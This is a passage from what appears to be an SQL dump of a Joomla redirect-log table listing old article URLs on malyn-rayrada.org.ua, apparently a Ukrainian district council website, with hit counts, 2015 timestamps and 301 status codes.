00:00:00',301),(20257,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=689:2012-05-29-17-48-13&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:49:42','0000-00-00 00:00:00',301),(20258,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=504:-2012-&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 00:51:49','0000-00-00 00:00:00',301),(20259,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=587:2012-02-27-13-44-05&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 00:53:19','0000-00-00 00:00:00',301),(20260,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=968:-2012-&Itemid=0&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 00:55:19','0000-00-00 00:00:00',301),(20261,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1100:2013-10-02-18-03-10&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 00:56:06','0000-00-00 00:00:00',301),(20262,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=468:-15-2011-120-l-r&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 00:56:36','0000-00-00 00:00:00',301),(20263,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=915:-14-2012-340-l-2012-2013-&Itemid=86&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 00:58:21','0000-00-00 00:00:00',301),(20264,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1308:2014-05-05-05-20-51&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 00:59:53','0000-00-00 00:00:00',301),(20265,'http://www.malyn-rayrada.org.ua/index.php?catid=55&id=1168:2014-01-08-07-14-14&Itemid=96&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:00:13','0000-00-00 00:00:00',301),(20266,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=744:2012-07-28-09-50-03&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:00:59','0000-00-00 00:00:00',301),(20267,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1163:2013-12-20-07-44-35&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 01:01:23','0000-00-00 00:00:00',301),(20268,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1137:2013-11-15-13-07-04&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:03:03','0000-00-00 00:00:00',301),(20269,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=505:2011-12-16-13-24-32&Itemid=73&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:03:22','0000-00-00 00:00:00',301),(20270,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=764:2012-09-26-12-58-07&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:03:59','0000-00-00 00:00:00',301),(20271,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1111:2013-10-22-16-06-36&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:04:19','0000-00-00 00:00:00',301),(20272,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=584:-20-2011-100-l-r-&Itemid=77&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:04:55','0000-00-00 00:00:00',301),(20273,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1327:2014-06-01-11-51-13&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 01:06:31','0000-00-00 00:00:00',301),(20274,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=309:----5----6--20--2011-&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:07:28','0000-00-00 00:00:00',301),(20275,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=637:2012-04-03-12-34-11&Itemid=80&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:07:45','0000-00-00 00:00:00',301),(20276,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=244:l-r&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:08:04','0000-00-00 00:00:00',301),(20277,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1220:2014-02-21-15-56-19&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:08:13','0000-00-00 00:00:00',301),(20278,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=787:2012-10-15-09-13-25&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:08:25','0000-00-00 00:00:00',301),(20279,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=605:-l-r-i-iii-&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:08:34','0000-00-00 00:00:00',301),(20280,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=763:2012-09-24-07-57-43&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:08:44','0000-00-00 00:00:00',301),(20281,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=188:2010-12-15-13-18-12&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:08:54','0000-00-00 00:00:00',301),(20282,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1166:2014-01-06-08-21-04&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:10:07','0000-00-00 00:00:00',301),(20283,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1030:2013-06-17-06-46-59&Itemid=92&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:10:19','0000-00-00 00:00:00',301),(20284,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=925:-l-r-&Itemid=86&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:11:02','0000-00-00 00:00:00',301),(20285,'http://www.malyn-rayrada.org.ua/index.php?catid=41&id=664:-------------l-r-lr&Itemid=78&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:11:51','0000-00-00 00:00:00',301),(20286,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1151:2013-11-28-14-54-33&Itemid=95&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:12:17','0000-00-00 00:00:00',301),(20287,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1111:2013-10-22-16-06-36&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:12:29','0000-00-00 00:00:00',301),(20288,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=710:2012-06-14-15-07-29&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:12:40','0000-00-00 00:00:00',301),(20289,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1093:------------2017-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:13:02','0000-00-00 00:00:00',301),(20290,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&Itemid=94&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:13:13','0000-00-00 00:00:00',301),(20291,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=733:-10-&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:13:57','0000-00-00 00:00:00',301),(20292,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=211:2010-12-15-14-46-24&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:14:29','0000-00-00 00:00:00',301),(20293,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1115:-24-&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:15:13','0000-00-00 00:00:00',301),(20294,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=872:2012-12-17-18-45-20&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:15:46','0000-00-00 00:00:00',301),(20295,'http://www.malyn-rayrada.org.ua/index.php?catid=41&id=664:-------------l-r-lr&Itemid=78&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:16:07','0000-00-00 00:00:00',301),(20296,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1291:2014-04-23-11-37-34&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:16:20','0000-00-00 00:00:00',301),(20297,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=619:-11-6-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:16:33','0000-00-00 00:00:00',301),(20298,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1088:2013-09-19-12-06-07&Itemid=70&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:16:42','0000-00-00 00:00:00',301),(20299,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=734:-6-2012-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:17:18','0000-00-00 00:00:00',301),(20300,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1157:-11-2013-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:17:51','0000-00-00 00:00:00',301),(20301,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=875:-2013-&Itemid=86&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:18:04','0000-00-00 00:00:00',301),(20302,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=751:-15-6-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:18:13','0000-00-00 00:00:00',301),(20303,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=581:2012-02-27-13-13-19&Itemid=77&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:18:21','0000-00-00 00:00:00',301),(20304,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1349:-31-&Itemid=&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:18:28','0000-00-00 00:00:00',301),(20305,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1111:2013-10-22-16-06-36&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:18:34','0000-00-00 00:00:00',301),(20306,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1313:2014-05-14-10-00-55&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 01:18:40','0000-00-00 00:00:00',301),(20307,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=954:-19-6-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:18:53','0000-00-00 00:00:00',301),(20308,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=636:-2011-2015-&Itemid=80&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:19:01','0000-00-00 00:00:00',301),(20309,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=326:2011-05-20-16-17-28&Itemid=66&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:19:15','0000-00-00 00:00:00',301),(20310,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1013:2013-06-01-03-58-38&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:19:22','0000-00-00 00:00:00',301),(20311,'http://www.malyn-rayrada.org.ua/index.php?catid=32&id=854:2012-12-11-13-40-55&Itemid=64&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:19:28','0000-00-00 00:00:00',301),(20312,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1126:2013-10-31-12-52-35&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:19:34','0000-00-00 00:00:00',301),(20313,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=321:------------l---------r--2011-2016-&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:20:05','0000-00-00 00:00:00',301),(20314,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=719:-lr&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:20:12','0000-00-00 00:00:00',301),(20315,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1131:9-------&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:20:32','0000-00-00 00:00:00',301),(20316,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=692:-2012&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:20:39','0000-00-00 00:00:00',301),(20317,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=699:--------------2011-2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:20:46','0000-00-00 00:00:00',301),(20318,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1107:c-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:21:02','0000-00-00 00:00:00',301),(20319,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1105:2013-10-11-16-43-25&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:21:09','0000-00-00 00:00:00',301),(20320,'http://www.malyn-rayrada.org.ua/index.php?id=57&Itemid=98&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 01:21:13','0000-00-00 00:00:00',301),(20321,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1208:2014-01-31-13-48-49&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 01:21:15','0000-00-00 00:00:00',301),(20322,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1008:2013-05-20-07-02-57&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:21:27','0000-00-00 00:00:00',301),(20323,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1166:2014-01-06-08-21-04&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:21:29','0000-00-00 00:00:00',301),(20324,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=981:2013-04-03-07-23-01&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:21:41','0000-00-00 00:00:00',301),(20325,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1165:-2014-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:22:11','0000-00-00 00:00:00',301),(20326,'http://www.malyn-rayrada.org.ua/index.php?id=49:--12042013-&Itemid=88&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 01:22:27','0000-00-00 00:00:00',301),(20327,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=554:-l-r&Itemid=76&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:22:59','0000-00-00 00:00:00',301),(20328,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1152:2013-11-28-14-58-05&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:23:05','0000-00-00 00:00:00',301),(20329,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=490:2011-12-02-09-02-47&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:23:16','0000-00-00 00:00:00',301),(20330,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1137:2013-11-15-13-07-04&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:23:19','0000-00-00 00:00:00',301),(20331,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1220:2014-02-21-15-56-19&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:23:23','0000-00-00 00:00:00',301),(20332,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=789:-2012-2014-&Itemid=84&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:23:28','0000-00-00 00:00:00',301),(20333,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=924:2013-02-20-19-06-08&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:23:34','0000-00-00 00:00:00',301),(20334,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1035:2013-06-25-09-55-31&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:23:36','0000-00-00 00:00:00',301),(20335,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1062:2013-07-29-13-33-29&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:23:47','0000-00-00 00:00:00',301),(20336,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=644:2012-04-04-09-52-48&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:23:53','0000-00-00 00:00:00',301),(20337,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1093:------------2017-&Itemid=70&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 01:24:00','0000-00-00 00:00:00',301),(20338,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=321:------------l---------r--2011-2016-&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:24:04','0000-00-00 00:00:00',301),(20339,'http://www.malyn-rayrada.org.ua/index.php?id=40&Itemid=77&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-12-11 01:24:11','0000-00-00 00:00:00',301),(20340,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1019:2013-06-06-11-26-38&Itemid=92&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:24:15','0000-00-00 00:00:00',301),(20341,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=704:--------20--2011--108-l---r----&Itemid=70&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:24:17','0000-00-00 00:00:00',301),(20342,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=452:-----------20--2011--100-l--r-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:24:21','0000-00-00 00:00:00',301),(20343,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=749:2012-08-24-05-59-17&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:24:25','0000-00-00 00:00:00',301),(20344,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1095:2013-09-24-13-25-55&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:24:27','0000-00-00 00:00:00',301),(20345,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1021:-l-r&Itemid=70&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:24:32','0000-00-00 00:00:00',301),(20346,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=804:2012-10-28-18-37-40&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:24:34','0000-00-00 00:00:00',301),(20347,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1093:-2017-&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:24:49','0000-00-00 00:00:00',301),(20348,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=936:2013-02-21-09-43-43&Itemid=86&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:24:51','0000-00-00 00:00:00',301),(20349,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1126:2013-10-31-12-52-35&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:25:03','0000-00-00 00:00:00',301),(20350,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=707:-231-280312-l-2012-r&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:25:05','0000-00-00 00:00:00',301),(20351,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1099:------------------l-r&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:25:08','0000-00-00 00:00:00',301),(20352,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=314:2011-05-20-13-01-00&Itemid=66&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 01:25:10','0000-00-00 00:00:00',301),(20353,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1023:-l-28r-&Itemid=92&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:25:14','0000-00-00 00:00:00',301),(20354,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=711:2012-06-14-15-09-26&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:25:20','0000-00-00 00:00:00',301),(20355,'http://www.malyn-rayrada.org.ua/index.php?id=36&Itemid=70&lang=ru&layout=blog&limitstart=20&option=com_content&view=category','','','',2,0,'2015-12-11 01:25:25','0000-00-00 00:00:00',301),(20356,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1193:-2014-2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:25:29','0000-00-00 00:00:00',301),(20357,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1007:-4-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:25:31','0000-00-00 00:00:00',301),(20358,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1072:-24-6-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:25:55','0000-00-00 00:00:00',301),(20359,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=472:-------------l-r-------&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:26:02','0000-00-00 00:00:00',301),(20360,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1137:2013-11-15-13-07-04&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:26:04','0000-00-00 00:00:00',301),(20361,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=210:-2010-&Itemid=60&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:26:12','0000-00-00 00:00:00',301),(20362,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=646:2012-04-08-07-58-55&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:26:14','0000-00-00 00:00:00',301),(20363,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=310:-2011-&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:26:23','0000-00-00 00:00:00',301),(20364,'http://www.malyn-rayrada.org.ua/index.php?id=53:--25102013-&Itemid=94&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',3,0,'2015-12-11 01:26:30','0000-00-00 00:00:00',301),(20365,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=315:2011-05-20-13-07-47&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:26:36','0000-00-00 00:00:00',301),(20366,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=198:------------2006-2010-r&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:26:40','0000-00-00 00:00:00',301),(20367,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=912:2013-01-22-14-14-06&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:26:53','0000-00-00 00:00:00',301),(20368,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=646:2012-04-08-07-58-55&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:27:00','0000-00-00 00:00:00',301),(20369,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1013:2013-06-01-03-58-38&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:27:04','0000-00-00 00:00:00',301),(20370,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=750:2012-09-01-09-40-02&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:27:06','0000-00-00 00:00:00',301),(20371,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1189:2014-01-28-09-46-45&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:27:10','0000-00-00 00:00:00',301),(20372,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=779:2012-10-03-12-34-44&Itemid=&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:27:39','0000-00-00 00:00:00',301),(20373,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=708:-l-r&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:27:45','0000-00-00 00:00:00',301),(20374,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=780:2012-10-04-07-48-30&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:27:58','0000-00-00 00:00:00',301),(20375,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1074:2013-09-02-05-02-30&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:28:02','0000-00-00 00:00:00',301),(20376,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=331:2011-05-20-16-30-09&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:28:05','0000-00-00 00:00:00',301),(20377,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1034:2013-06-23-15-11-25&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:28:09','0000-00-00 00:00:00',301),(20378,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=767:2012-10-01-08-20-30&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:28:11','0000-00-00 00:00:00',301),(20379,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=449:2011-10-28-08-04-47&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:28:20','0000-00-00 00:00:00',301),(20380,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=600:2012-03-01-06-12-24&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:28:26','0000-00-00 00:00:00',301),(20381,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1095:2013-09-24-13-25-55&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:28:28','0000-00-00 00:00:00',301),(20382,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1179:2014-01-21-12-44-04&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:28:32','0000-00-00 00:00:00',301),(20383,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1099:-l-r&Itemid=94&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:28:35','0000-00-00 00:00:00',301),(20384,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=698:-6-16112010-5-&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:28:45','0000-00-00 00:00:00',301),(20385,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1291:2014-04-23-11-37-34&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:28:50','0000-00-00 00:00:00',301),(20386,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1201:2014-01-31-07-43-11&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:28:52','0000-00-00 00:00:00',301),(20387,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=509:2011-12-20-08-03-11&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:29:01','0000-00-00 00:00:00',301),(20388,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=678:----------------2012-2014-&Itemid=80&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:29:03','0000-00-00 00:00:00',301),(20389,'http://www.malyn-rayrada.org.ua/index.php?catid=58:--30042014-&id=1294:-2012-2015-&Itemid=105&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:29:09','0000-00-00 00:00:00',301),(20390,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=367:-1620-19072011-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:29:13','0000-00-00 00:00:00',301),(20391,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1194:-2012-2015-&Itemid=97&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:29:20','0000-00-00 00:00:00',301),(20392,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=584:-20-2011-100-l-r-&Itemid=77&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:29:24','0000-00-00 00:00:00',301),(20393,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=520:-2012-2013-&Itemid=73&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:29:26','0000-00-00 